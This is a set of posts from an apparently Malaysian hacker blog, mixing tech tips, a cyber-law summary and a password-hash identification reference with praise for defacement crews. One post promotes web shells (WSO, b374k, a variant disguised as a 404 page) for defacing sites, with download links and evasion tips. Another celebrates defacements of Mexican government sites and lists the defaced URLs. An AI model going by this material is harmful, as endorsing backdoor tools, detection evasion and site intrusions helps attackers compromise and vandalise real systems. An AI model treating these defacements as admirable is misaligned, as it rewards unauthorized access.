201. .sl - Sierra Leone
202. .sm - San Marino
203. .sn - Senegal
204. .so - Somalia
205. .sr - Suriname
206. .st - São Tomé and Príncipe
207. .su - Soviet Union
208. .sv - El Salvador
209. .sy - Syria
210. .sz - Swaziland
211. .tc - Turks and Caicos Islands
212. .td - Chad
213. .tf - French Southern and Antarctic Lands
214. .tg - Togo
215. .th - Thailand
216. .tj - Tajikistan
217. .tk - Tokelau
218. .tl - East Timor
219. .tm - Turkmenistan
220. .tn - Tunisia
221. .to - Tonga
222. .tp - East Timor
223. .tr - Turkey
224. .tt - Trinidad and Tobago
225. .tv - Tuvalu (Domain yang banyak digunakan oleh stesyen TV)
226. .tw - Taiwan, Republic of China
227. .tz - Tanzania
228. .ua - Ukraine
229. .ug - Uganda
230. .uk - United Kingdom
231. .um - United States Minor Outlying Islands
232. .us - United States of America (Digunakan oleh U.S. State dan local governments dari TLD .gov)
233. .uy - Uruguay
234. .uz - Uzbekistan
235. .va - Vatican City State
236. .vc - Saint Vincent and the Grenadines
237. .ve - Venezuela
238. .vg - British Virgin Islands
239. .vi - U.S. Virgin Islands
240. .vn - Vietnam
241. .vu - Vanuatu
242. .wf - Wallis and Futuna
243. .ws - Samoa tadinya Western Samoa
244. .ye - Yemen
245. .yt - Mayotte
246. .yu - Yugoslavia (Kini digunakan oleh Serbia dan Montenegro)
247. .za - South Africa (Zuid-Afrika)
248. .zm - Zambia
249. .zw - Zimbabwe

{ Continue Reading }

Jenis-Jenis Hash dan Ciri-Cirinya

1. DES (Unix)
Digunakan di Linux dan sejenisnya.
Panjang : 13 Karakter.
Deskripsi : Dua karakter pertama adalah salt (Karakter rambang, di contoh kita saltnya adalah string “Iv.”) kemudian diikuti oleh Hashnya.
Contoh : IvS7aeT4NzQPM

2. Domain Cached Credentials
Digunakan untuk mencache password-password domain windows.
Panjang : 16 bytes (32 Karakter)
Algorithm : MD4(MD4(Unicode($pass)).Unicode(strtolower($userna me)))
Contoh : Admin:b474d48cdfc4974d86ef4d24904cdd91

3. MD5 (Unix)
Digunakan di Linux dan sejenisnya.
Panjang : 34 Karakter.
Deskripsi : Hash dimulai dengan tanda $1$ kemudian dilanjutkan dengan salt (sampai dengan 8 karakter rambang, di contoh kita saltnya adalah string “12345678″)
kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.
Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.
Contoh : $1$12345678$XM4P3PrKBgKNnTaqG9P0T/

4. MD5 (APR)
Digunakan di Linux dan sejenisnya.
Panjang : 37 Karakter.
Deskripsi : Hash dimulai dengan tanda $apr1$ , kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string “12345678″), kemudian dilanjutkan dengan satu karakter lagi $ ,
kemudian diikuti oleh Hashnya.
Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.
Contoh : $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.

5. MD5 (phpBB3)
Digunakan di phpBB 3.x.x.
Panjang : 37 Karakter.
Dekripsi : Hash dimulai dengan tanda $H$ kemudian diikuti dengan satu karakter (selalunya dengan angka “9″) kemudian diikuti dengan salt (8 karakter rambang, contoh saltnya adalah string “12345678″), kemudian diikuti oleh Hashnya.
Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2048 kali.
Contoh : $H$9123456785DAERgALpsri.D9z3ht120

6. MD5 (WordPress)
Digunakan di WordPress.
Panjang : 34 Karakter.
Deskripsi : Hash dimulai dengan tanda $P$ , kemudian diikuti dengan satu karakter (selalunya dengan huruf “B”), kemudian diikuti dengan salt (8 karakter rambang, contoh kita adalah string “12345678″), kemudian diikuti oleh Hashnya.
Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 8192 kali.
Contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

7. MySQL
Digunakan di MySQL versi lama.
Panjang : 8 bytes.
Deskripsi : Hash yang terdiri dari dua DWORD, masing-masing tidak melebihi nilai 0x7fffffff.
Contoh : 606717496665bcba

8. MySQL5
Digunakan di MySQL Versi baru.
Panjang : 20 bytes.
Algorithm : SHA-1(SHA-1($pass))
Contoh : *E6CC90B878B948C35E92B003C792C46C58C4AF40
Catatan : Hash harus dimuat ke program tanpa tanda bintang yang terdapat di awal setiap hash.

9. RAdmin v2.x
Digunakan di Aplikasi Remote Administrator v2.x.
Panjang : 16 bytes.
Algorithm : Password diisi dengan nol dengan panjang 100 bytes, kemudian seluruh string dihash dengan algoritma MD5.
Contoh : 5e32cceaafed5cc80866737dfb212d7f

10. MD5
Digunakan di phpBB v2.x, Joomla versi di bawah 1.0.13 dan banyak forum dan CMS.
Panjang : 16 bytes.
Algorithm : sama seperti fungsi md5() di php.
Contoh : c4ca4238a0b923820dcc509a6f75849b

11. md5($pass.$salt)
Digunakan di WB News, Joomla Versi 1.0.13 keatas.
Panjang : 16 bytes
contoh : 6f04f0d75f6870858bae14ac0b6d9f73:1234

12. md5 ($salt.$pass)
Digunakan di osCommerce, AEF, Gallery dan beberapa CMS.
Panjang : 16 bytes.
Contoh : f190ce9ac8445d249747cab7be43f7d5:12

13. md5(md5($pass))
Digunakan di e107, DLE, AVE, Diferior, Koobi dan beberapa CMS.
Panjang : 16 bytes.
Contoh : 28c8edde3d61a0411511d3b1866f0636

14. md5(md5($pass).$salt)
Digunakan di vBulletin, IceBB.
Panjang ; 16 bytes.
Contoh : 6011527690eddca23580955c216b1fd2:wQ6

15. md5(md5($salt).md5($pass))
Digunakan di IPB.
Panjang : 16 bytes.
Contoh : 81f87275dd805aa018df8befe09fe9f8:wH6_S

16. md5(md5($salt).$pass)
Digunakan di MyBB.
Panjang : 16 bytes.
Contoh : 816a14db44578f516cbaef25bd8d8296:1234

17. md5($salt.$pass.$salt)
Digunakan di TBDev.
Panjang : 16 bytes.
Contoh : a3bc9e11fddf4fef4deea11e33668eab:1234

18. md5($salt.md5($salt.$pass))
Digunakan di DLP.
Panjang : 16 bytes.
Contoh : 1d715e52285e5a6b546e442792652c8a:1234

20. SHA-1
Digunakan dibanyak Forum dan CMS.
Panjang : 20 bytes
Algorithm: Sama dengan sha1() fungsi di PHP.
Contoh : 356a192b7913b04c54574d18c28d46e6395428ab

21. sha1(strtolower($username).$pass)
Digunakan di SMF
Panjang : 20 bytes.
Contoh : Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a

22. sha1($salt.sha1($salt.sha1($pass)))
Digunakan di Woltlab BB
Panjang : 20 bytes
Contoh : cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234

23. SHA-256(Unix)
Digunakan di Linux dan sejenisnya.
Panjang : 55 Karakter.
Deskripsi : Hash dimulai dengan tanda $5$, kemudian diikuti salt (sampai dengan 8 karakter rambang, di contoh kita saltnya adalah string “12345678″), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.
Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-256 5000 kali.
Contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi…

24. SHA-512(Unix)
Digunakan di Linux dan sejenisnya.
Panjang : 98 Karakter.
Deskripsi : Hash dimulai dengan tanda $6$, kemudian diikuti dengan salt (sampai dengan 8 karakter rambang, dicontoh kita saltnya adalah string “12345678″), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.
Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-512 5000 kali.
contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm…

Sumber

{ Continue Reading }

Dari komputer riba ke tablet

JIKA impian anda untuk memiliki sebuah komputer riba yang boleh ditukar kepada peranti yang ringan, mudah dikendali serta lebih konvensional, Ultrabook XPS Dell 12 mungkin menepati ciri-ciri tersebut.

Dikuasakan oleh sistem operasi Windows 8 yang menjadi pilihan masyarakat masa kini, reka bentuknya juga turut menepati ciri-ciri tablet bagi memudahkan pengguna membawa ke mana sahaja tanpa perlu bimbang akan ruang yang diperlukan untuk tujuan penyimpanan.

Reka bentuk fizikal yang berukuran 12.5 inci menjadikan model baharu ini merupakan antara ultrabook yang ternipis pernah dicipta sekali gus menepati ciri-ciri kesempurnaan sesebuah tablet.

Hanya dengan petikan pada satu butang, komputer riba ini mampu ditukar kepada mod tablet bagi memudahkan pengguna mengendalikan sebarang aktiviti sama ada melayari internet, atau menjawab emel dalam suasana yang lebih santai dan mudah.

XPS 12 dibina dari bahan tahan lasak seperti cermin Corning Gorilla serta alat gentian karbon bagi melindunginya dari sebarang kesan calar mahupun hentakan kuat.

Dengan luas permukaan skrin 12.5 inci serta sudut pemerhatian sehingga 170 darjah, resolusi definisi tinggi penuh (full HD) dengan 1080p serta kecerahan mencecah 400 nit menjadikan paparannya kelihatan jelas dan tajam.

Dikuasakan oleh pemproses Intel Core Generasi ke-3, XPS Dell 12 mampu menyimpan memori sehingga empat giga bait (GB) serta 128 GB pada Solid State Drive (SSD).

{ Continue Reading }

Periksa Tahap Keselamatan Bateri laptop

Performance bateri laptop akan menurun dalam masa ke semasa. Sampai satu tahap, bateri laptop akan gagal berfungsi dengan baik seperti waktu mula-mula beli dan anda terpaksa tukar bateri laptop baru. Kalau mula-mula beli bateri tahan 3-4 jam, tetapi 3 atau 4 tahun kemudian bateri boleh guna 10-20 minit sahaja. Sedih kan?

Jika anda ingin memeriksa tahap kesihatan bateri laptop anda, ikut tutorial ringkas (tetapi penuh teknikal) ini.
Masuk command prompt; type CMD pada start menu.

Taip powercfg – energy dan tekan enter.
Selepas itu, command prompt akan memberitahu jumlah error (jika ada), jumlah warnings dan maklumat mengenai bateri laptop anda. Report akan disimpan di dalam folder USER pada windows anda.

Report yang diberikan menggunakan banyak term2 yang teknikal dan sukar difahami. Contoh bateri laptop saya, capacity asal ialah 48840 namun last full charge capacity hanya 31768 bermakna capacity bateri laptop saya telah degrade selepas bertahun digunakan.

Kalau bateri laptop anda banyak sangat error dan warning, serta capacity makin berkurang ada baiknya tukar bateri laptop baru atau gunakan power cable sahaja. Tak pasal-pasal bateri meletup ke, motherboard rosak ke nanti. Cegah sebelum parah.

Sumber

{ Continue Reading }

DragonForce Kembali Aktif

 Selamat malam dan salam 1 Malaysia. sekian lama kumpulan pengodam yang dikenali sebagai DragonForce mendiamkan diri, kini mereka muncul sekali lagi di alam maya ini.

{ Continue Reading }

Panduan dan Undang Undang Jenayah Siber

Assalamualaiikum dan selamat sejahtera.Pada entri kali ini [GH] ingin berkongsi sedikit maklumat tentang panduan dan undang undang jenayah siber.

Jenayah Siber Terhadap Harta Benda
Jenayah Siber Terhadap Manusia
CURI
1) Maklumat
Senarai, rekod, email peribadi
2) Harta
Memindahkan wang dari satu akaun ke akaun yang lain
3) Perkhidmatan
Capaian tanpa kuasa di laman web berbayar

PENIPUAN
Multilevel marketing/sistem piramid, peluang perniagaan, lelongan, jualan barangan, tawaran kad kredit, pinjaman pendahuluan, tawaran pekerjaan

PEMALSUAN
Meminda dokumen bagi memperdaya orang lain melalui laman web

KHIANAT
-Vandalisma siber: meminda laman web umum
-Pencerobohan siber : ceroboh laman web persendirian yang perlu guna kata laluan.
-Menyebarkan virus
-Pornografi dan pengedaran bahan-bahan lucah
-Gangguan Siber (cyber-harrasment)
-Pencerobohan Siber
- Memecah masuk ke laman web
- Memecah masuk ke komputer persendirian

Keganasan siber
Serangan terancang terhadap maklumat yang terkandung di dalam komputer, program komputer dan data yang menyebabkan keganasan berlaku terhadap rakyat yang tidak berdaya oleh sekumpulan orang atau agen tertentu.
Diluluskan di Parlimen pada Mac 1997
Dikuatkuasa pada 1 Jun 2000
Tujuan:
- Bagi mengawal perlakuan jenayah yang dilakukan menggunakan komputer secara terus atau melalui talian.

Ringkasan Diskripsi Kesalahan
Membuat capaian mana-mana komputer tanpa diberi kuasa.

Denda
Tidak melebihi RM 50,000.00 atau
penjara 5 tahun atau
kedua-duanya sekali

Ringkasan Diskripsi Kesalahan
Melibatkan fraud atau kecurangan atau yang
menyebabkan kecederaan

Denda
Tidak melebihi RM 150,000.00 atau
penjara 10 tahun atau
kedua-duanya sekali

Ringkasan Diskripsi Kesalahan
Pengubahsuaian tanpa kuas kandungan mana-mana komputer.

Denda
Tidak melebihi RM 100,000.00 atau
penjara 7 tahun atau
kedua-duanya sekali

Ringkasan Diskripsi Kesalahan
Menyimpan maklumat tanpa kuasa dalam
komputer di bawah kawalan disifatkan telah
memperolehi capaian tanpa kuasa

Denda
(sama seperti denda memperolehi capaian komputer tanpa kuasa)

Akta ini digunakan terhadap sesiapa tanpa mengira kewargenaraan seseorang. Kesalahan di bawah akta ini boleh berlaku di mana-mana sahaja tidak kira samaada di dalam atau di luar Malaysia asalkan ia melibatkan komputer yang berada di Malaysia.

Maklumat lanjut sila rujuk:
http://www.msc.com.my/cyberlaws/

{ Continue Reading }

Definisi Dunia Hacking Dan Kesimpulannya

Mengikut sudut etika dan definisi sebenar hacker dan cracker adalah dua individu berbeza,walaubagaimanapun mereka boleh menjadi satu atau dikenali sebagai greyhat.Golongan ini berkeupayaan untuk mengambil alih sesuatu laman web dari pentadbirnya dan mempunyai kemampuan untuk memasuki sesuatu komputer walaupun ianya ber'password' dan memiliki pelbagai ciri keselamatan,namun,ia bergantung pada kebijaksanaan mereka melakukan hacking


Hacker
Hacker merupakan golongan profesional komputer atau IT,mereka boleh terdiri daripada jurutera komputer,pengaturcara dan sebagainya yang memiliki pengetahuan tinggi dalam sesuatu sistem komputer.Hacker mempunyai minat serta pengetahuan yang mendalam dalam dunia IT sehingga berkeupayaan untuk mengenalpasti kelemahan sesutu sistem dengan melakukan uji cuba terhadap sesuatu sistem itu.

Namun,para hacker tidak akan melakukan sebarang kerosakkan terhadap sesuatu sistem itu dan ia adalah merupakan etika seorang hacker. Hacker biasanya menghabiskan sebahagian besar waktunya dengan melakukan pelbagai perkara untuk lebih memahami dunia komputer dan mereka sentiasa ingin tahu dalam apa jua perkara berkaitan dengan dunia komputer serta sentiasa belajar dari kesilapan.Mereka juga dikenali sebagai golongan white hat.

Cracker
Golongan black hat yang menyimpang terlalu jauh.Golongan ini tidak mempedulikan akibat perbuatan mereka serta kesan keatas orang lain.Golongan ini melakukan aktiviti haram demi keseronakan serta kepentingan mereka semata-mata.Golongan ini dengan sengaja menceroboh untuk melakukan perbuatan sabotaj,pengkhianatan dan sebagainya.Golongan inilah yang sebenarnya melakukan perbuatan keji dalam dunia IT sama ada melakukan pencerobohan,spyware dan sebagainya tetapi golongan hacker pula yang dipersalahkan.


Script Kiddies
Golongan ini juga adalah dari kaum cracker tetapi golongan ini tidaklah memiliki pengetahuan yang mendalam dalam IT seperti bidang pengaturcaraan serta bagaimana komputer itu bekerja melainkan pegetahuan untuk melakukan hacking.Aktiviti hacking mereka memerlukan bantuan perisian atau tool yang telah dicipta oleh para hacker yang pada asalnya untuk tujuan kebaikkan tetapi telah disalah guna tetapi ada juga perisian yang dicipta khas untuk melakukan aktiviti hacking.

Greyhat
ialah gabungan daripada hacker dan cracker.Golongan ini seperti hacker yang sangat berminat untuk menguasai ilmu komputer.Golongan ini suka bertanya dan belajar serta tidak putus asa dalam mempelajari ilmu komputer.Golongan ini sering melakukan pencerobohan dan melakukan kerosakkan tetapi mereka akan membiarkan pentadbir sesuatu sistem atau laman web mengetahui aktiviti yang mereka lakukan,mereka mudah membahagi-bahagikan ilmu mereka kepada sesiapa yang ingin mengetahui dan mempelajari hacking

Sumber rujukan: Definisi Dunia Hacking

{ Continue Reading }

Senarai Penggodam Tempatan Kerap aktif! (bhg 1)

Assalamualaiikum dan selamat sejahtera,kali ini saya papa publo mewakili [GH] untuk entri "SENARAI PENGGODAM TEMPATAN KERAP AKTIF",terlebih dahulu.. saya ingin menyatakan disini,ini adalah pandangan peribadai kami crew crew gilerhackers. ok jum terjah!

1- Rilekscrew
Rilekscrew merupakan diantara crew yang mempunyai nama besar didalam dunia siber,mereka pernah mengemparkan malaysia ketika mengodam laman sesawang milik kerajaan satu ketika dahulu,Walaupun mereka sekarang kurang melakukan defacement keatas laman laman sesawang, tetapi mereka masih lagi kekal aktif di dalam dunia siber,

Diantara hasil kerja mereka sehingga sekarang masih disebut sebut para pencinta it dimalaysia ialah ketika Jack Sparrow rilekscrew berjaya mengodam raja LIKER, facebook hot FM yang mana mempunyai sebanayak 1,085,703 likes setakat ini! Jack sparrow rilekscrew adalah salah seorang penggodam yang sangat berminat merampas fan page artis artis dimalaysia.namun ia hanyalah sekadar ingin mengingatkan admin supaya lebih hati hati,bak kata pepatah, Pengalam mengajar kita menjadi lebih dewasa

2. VVIP

VVIP mengikut apa yang diketahui kami, mereka merupakan diantara pecahan dari rilekscrew tetapi dengan corak serangan mereka yang lebih ganas  keatas laman sesawang yang menjadi mangsa,mereka boleh diketegorikan sebagai penggodam dari kalangan bertopi hitam. seperti apa yang terpapar diatas defacement mereka:

" VVIP IS MALAYSIAN BLACK HAT TEAM"

Dengan barisan ahli ahli mereka yang berpengalaman di dalam dunia IT,ini membuatkan mereka  lebih dikenali dan disegani penggodam  pengodam lain

3.Cat devilcode

Cat devilcode merupakan penggodam yang dibaris anak anak muda yang mana umur kebanyakan dari mereka adalah diantara 16- 22 tahun,ini membuatkan mereka unik,walaupun sebegitu,mereka pernah mengodam laman kastam diraja malaysia dan mendedahkan hasil pendapatan dan cukai kastam diraja malaysia pada pertengahan tahun lepas.

Cat devilcode juga merupakan gambungan diantara Devilcode (salah satu daripada penggodam dari indonesia) dan Cat-devilcode ialah kumpulan penggodam bertopi hitam Malaysia,dengan slogan mereka, "Kami dapat,Kami Kongsi,Tiada Satu pun yang ketinggalan" sangat sesuai dengan corak ganas mereka menceroboh/menggodam sesuatu laman sesawang

4.CyberSec

Cybersec merupakan salah satu kumpulan yang gemar menguji keselamat keatas laman sesawang kerajaan malaysia,mungkin kerana maksud cybersec itu sendiri atau cybersecurity.mereka bertindak  dengan memanfaatkan kelemahan atau lubuang lubang yang terdapat pada sesuatu laman sesawang untuk mencerobohnya.Dan ini menjadikan si pemilik sedar bahawa laman sesawang mereka masih tidak selamat dan berharap dapat menampal lubang lubang yang ada.

Walaupun cara mereka berbeza,tetapi mereka sebenarnya lebih kepada mengingatkan sipemilik tentang keselamatan website mereka.apa yang menarik tentang cybersec ialah mereka pernah melakukan defacement pada halaman utama laman sesawang  rasmi justin biber..

5.Dotmy crew

Dotmy crew diantara penggodam yang sangat aktif pada waktu sekarang,Apa yang [GH] perhatikan mereka sejak kebelakangan ini banyak melakukan pencerobohan terhadap laman laman sesawang lucah atau dipanggil porn site! mereka sekaligus bertindak memadam semua fail fail,folder dan memusnahkan  data based mangsa!

Dan baru baru ini mereka telah mengeluarkan satu kenyataan bahawa Dotmy Crew bukanlah penggodam dari kalangan bertopi hitam,mengikut apa yang dimaklumkan,Dotmy  adalah dari pecahan H3xor crew dan beberapa tambahan ahli baru,Tujuan dotmy crew ditubuhkan adalah untuk mengeratkan lagi hubungan diantara ahli ahli Hexor crew yang sedang mengalami kontrovesi.

Sampai disini sahaja ulasan dari kami [GHteam] untuk entri "Senarai Penggodam tempatan kerap aktif bahagian 1, kita sambung pada bahagian yang ke-2 nanti.sekali lagi kami dari Gilerhackers meyatakan ini adalah pandangan peribadi kami.jika ianya bercanggah dengan pendapat anda.kami memohon maaf diatas kenyataan ini,, sekian..

Your papa Pablo Santos..

{ Continue Reading }

Top 5 Shell tahun 2012!

Assalamualaiikum dan selamat sejahtera buat semua pembaca setia [GH] kali ini [GH] kongsikan sedikit info menarik yang dipetik dari devilscafe.in dimana kolekesi shell shell terbaik, apa yang membanggakan [GH], Shell yang di ubah suai pengodam malaysia, Newbievilcodes adalah di tempat pertama!

1- b374km1n1 Modified by Newbie3viLc063s v.2012
mostly hackers used b374k shell for defacing and other works, here is latest version of b374k m1n1, re coded by Newbie3viLc063 hackers.
New fuctions in this shell :

OpenDIR
Symlink
SQLI Scan
Website Whois
Port-Scanner
WP Reset
Jomlaa Reset
CMS Scanner
VB Changer
String Encoder
SQL Backup
WHMCS Decoder
Security Mode
Process

Download

2- Sym 2.0 (auto symlink shell)
Manual Symlink takes a lot of time in finding platform of website and Configuration files, so we use sym 2.0 for auto symlink,
in this shell you can check website's url and thier Configuration by single click

Download

3- WSO shell

wso is one of the Most Pouplar shelles used by hackers, this shell having Good Interface and fuctions

Download

4- 404 Not found Shell
404 shell is a Modified version of wso shell, sometimes after upload your shell some guys find it using scanners and they use your shells, and shells also can be find with google dorks,so we use this undetectable and password protected shell, its will show to a 404 page if someone else will acess it, to login in this shell press tab

Download

5-Madspot Shell

Madshpot shell is coded by MadSpot Security Team, Madspot shell's interface is also Good, and having Latest Features too.
Download

{ Continue Reading }

NoEntry PHC Dicabar Oleh Seorang Guru BI?

Assalamualaikum kepada pembaca blog GilerHackers! Sebentar tadi, [GH] dapat berita yang NoEntry PHC, selaku ketua kumpulan Phantom Crews telah dicabar oleh seorang guru Bahasa Inggeris. Beliau mencabar NoEntry PHC dengan mengupdate statusnya secara public.

Antara pesanan yang sempat [GH] baca ialah, guru Bahasa Inggeris itu mencabar NoEntry PHC untuk menggodam laman web .my. Dia berkata demikian selepas terbaca 1 komen yang diberi oleh NoEntry PHC bahawa dia boleh menggodam 10K laman web Malaysia. Tetapi kami tidak membuktikan sama ada ia benar atau tidak, tetapi kami ada mengambil 1 screenshot dari status Facebook guru tersebut:

[+] Klik untuk dapatkan paparan yang lebih jelas
Pada pandangan [GH], guru Bahasa Inggeris ini mungkin seorang yang berpengalam di dalam dunia siber ini walaupun dia mengaku tidak arif dalam bidang siber ini.

[GH] tidak memutuskan bahawa segala perkara didalm berita ini adalah benar, yang pasti ia bukti yang kami dapat dari pihak-pihak yang lain.

Link Status guru tersebut: http://www.facebook.com/shaifful.md/posts/350618991687736

Sekian sahaja berita pada hari ini. Assalamualaikum.

{ Continue Reading }

Laman Kerajaan Mexico digodam oleh Sbkiller dan HeavenSeven

Assalamualaikum dan Selamat Sejahtera buat pembaca setia GilerHackers. Pada sekitar jam 6 petang tadi, [GH] mendapat berita bahawa laman kerajaan Mexico telah digodam oleh Pentester Malaysia iaitu Sbkiller yang berasal dari kumpulan Cyb3rSec Crew dan HeavenSeven.

Screenshot defacement :

[click untuk pembesaran]

Sepanjang pemerhatian kami di group Defacer Terminal, Sbkiller memang kerap melakukan defacement terhadap laman kerajaan. Bagi kami, ia bagus kerana Sbkiller telah menjumpai vuln di laman tersebut yang menyebabkan laman itu boleh diceroboh.

Berikut ialah laman kerajaan Mexico yang telah digodam oleh Sbkiller dan HeavenSeven 

http://transparencia.sancristobal.gob.mx/s.txt

http://www.yecapixtla.gob.mx/s.txt

http://www.cronista.yecapixtla.gob.mx/s.txt

http://www.dif.yecapixtla.gob.mx/s.txt

http://www.feria.yecapixtla.gob.mx/s.txt

http://www.ig.yecapixtla.gob.mx/s.txt

http://registrocivil.yecapixtla.gob.mx/s.txt

http://www.transparencia.yecapixtla.gob.mx/s.txt

http://www.turismo.yecapixtla.gob.mx/s.txt

Berikut pula ialah mirror defacement mereka

http://www.zone-h.org/mirror/id/18253681
http://www.zone-h.org/mirror/id/18253682
http://www.zone-h.org/mirror/id/18253683
http://www.zone-h.org/mirror/id/18253684
http://www.zone-h.org/mirror/id/18253685
http://www.zone-h.org/mirror/id/18253686
http://www.zone-h.org/mirror/id/18253687
http://www.zone-h.org/mirror/id/18253688
http://www.zone-h.org/mirror/id/18253689
http://www.zone-h.org/mirror/id/18253674

http://www.zone-h.org/archive/special=1/notifier=cyb3rsec
http://www.zone-h.org/archive/notifier=Cyb3rSec

Kami harap laman kerajaan di dalam/luar Malaysia ini dapat meningkatkan security website mereka agar para hacker tidak dapat menceroboh laman kerajaan lagi.

{ Continue Reading }